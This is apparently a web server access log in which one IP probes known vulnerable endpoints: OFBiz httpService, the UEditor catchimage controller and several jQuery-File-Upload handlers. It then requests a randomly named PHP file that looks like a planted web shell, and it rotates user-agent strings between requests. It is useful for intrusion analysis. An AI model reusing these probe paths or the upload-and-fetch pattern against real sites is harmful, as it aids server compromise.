165.232.54.158 - - [13/Jan/2026:16:13:53 +0800] "POST /webtools/control/httpService HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.1"
103.4.122.14 - - [13/Jan/2026:16:13:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768292036.6140511035919189453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:16:13:53 +0800] "POST /umotion/modules/reporting/track_import_export.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:14:58 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:18:11 +0800] "POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1" 500 1004 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:21:13 +0800] "POST /jQuery-File-Upload/server/php/index.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "POST /jquery-file-upload/server/php/index.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:16:21:13 +0800] "GET /files/Qrhl8HvU.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "GET /jquery-file-upload/server/php/index.php/files/Qrhl8HvU.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:16:21:14 +0800] "POST /server/php/upload.class.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:16:21:13 +0800] "GET /jQuery-File-Upload/server/php/index.php/files/Qrhl8HvU.php HTTP/1.1" 301 - "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
